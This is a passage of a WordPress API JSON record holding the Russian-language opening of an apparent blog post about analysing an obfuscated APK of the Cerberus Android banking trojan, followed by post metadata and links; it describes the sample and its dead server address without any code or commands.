\u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u0447\u0442\u043e \u0438\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442 \u0437\u0430\u0449\u0438\u0449\u0435\u043d. \u041d\u043e \u0437\u043b\u043e\u0434\u0435\u0438 \u043d\u0435 \u0434\u0440\u0435\u043c\u043b\u044e\u0442 \u0438 \u0441\u043e\u0437\u0434\u0430\u044e\u0442 \u0441\u0432\u043e\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u044b \u0434\u043b\u044f Android. <\/p>\n<p>  \u0421\u043b\u0443\u0447\u0430\u0439\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043c\u043d\u0435 \u043f\u043e\u043f\u0430\u043b\u0441\u044f \u043d\u0430 \u0440\u0443\u043a\u0438 \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 apk \u0444\u0430\u0439\u043b, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u043e\u0439 \u043c\u0430\u043b\u0432\u0430\u0440\u044c\u044e \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c \u00abCerberus\u00bb, \u0438 \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u043e\u043d \u0432 2019 \u0433\u043e\u0434\u0443.<\/p>\n<p>  APK \u0444\u0430\u0439\u043b \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0431\u043e\u0442\u043d\u0435\u0442\u0430 \u043f\u043e\u043f\u0430\u043b \u043a\u043e \u043c\u043d\u0435 \u0441 \u043d\u0435\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0430\u0434\u0440\u0435\u0441\u043e\u043c \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c, \u043f\u043e \u044d\u0442\u043e\u043c\u0443 \u0447\u0430\u0441\u0442\u044c \u043b\u043e\u0433\u0438\u043a\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u0430 \u043e\u0441\u0442\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u0438\u0437\u0443\u0447\u0435\u043d\u043d\u043e\u0439, \u0442\u0430\u043a \u043a\u0430\u043a \u0434\u0430\u043d\u043d\u044b\u0439 \u0431\u043e\u0442\u043d\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u00ab\u043c\u043e\u0434\u0443\u043b\u044c\u043d\u0443\u044e\u00bb \u0441\u0438\u0441\u0442\u0435\u043c\u0443, \u0438 \u043f\u043e\u0434\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0441\u043e \u0441\u0432\u043e\u0435\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430.  <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-292027","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/292027","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=292027"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/292027\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=292027"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=292027"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=292027"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}